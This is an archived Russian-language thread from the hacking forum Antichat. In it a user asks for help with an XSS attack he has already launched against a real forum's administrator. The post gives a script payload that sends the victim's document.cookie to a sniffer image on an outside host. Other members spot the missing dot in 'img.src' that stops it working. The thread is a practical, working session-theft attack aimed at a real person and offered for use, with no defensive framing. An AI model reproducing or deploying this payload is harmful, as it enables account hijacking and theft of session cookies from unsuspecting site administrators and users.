Форум АНТИЧАТ - Вопрос по организации XSS атаки, на уязвимом форуме..

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Форумы (https://forum.antichat.xyz/forumdisplay.php?f=16)

- - Вопрос по организации XSS атаки, на уязвимом форуме.. (https://forum.antichat.xyz/showthread.php?t=21517)

a1nt	09.07.2006 10:09

Вопрос по организации XSS атаки, на уязвимом форуме..

Нашел уязвимый форум, где можно вставить

Код:

<script></script>

. Чтобы забрать cookies админа отправил ему сообщение

Код:

<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>

Где картинк - сниффер на antichat.org. Но когда я написал этот код в html и открыл браузером - моя загрузка в лог добавлена не была, только когда напрямую обращаюсь к http://antichat.org/s/a1nt.gif, мой IP добавляется. В чем же все-таки проблема и стоит ли мне ждать админских cookies?

Azazel

09.07.2006 11:49

Посмотри что у тебя в сорсе сообщения. Может фильтруются символы какие-нибудь.

a1nt	09.07.2006 19:40

В том то и дело, что уязвимость проверенная. Я не понимаю почему конструкция

Код:

<script>img = new Image(); img src = "http://antichat.org/s/a1nt.gif?"+document.cookie;</script>

Не работает на моем компьютере.

FQziT

09.07.2006 20:07

Цитата:

Цитата:

Найди отличие

Dracula4ever

09.07.2006 20:19

Цитата:

Сообщение от FQziT

Найди отличие

я помогу.

Цитата:

Цитата:

D1mOn

09.07.2006 20:21

Цитата:

точку забыл!

podkashey

09.07.2006 20:29

a1nt, это приватная инфа - в паблике нету...

FQziT

09.07.2006 20:34

dracula4ever, D1mOn: Пять за сообразительность :-)

a1nt	09.07.2006 20:58

Епс!! Надо ж так... Ухххх..... Спасибо что ткнули носом, извините за ламеризм.

Время: 12:35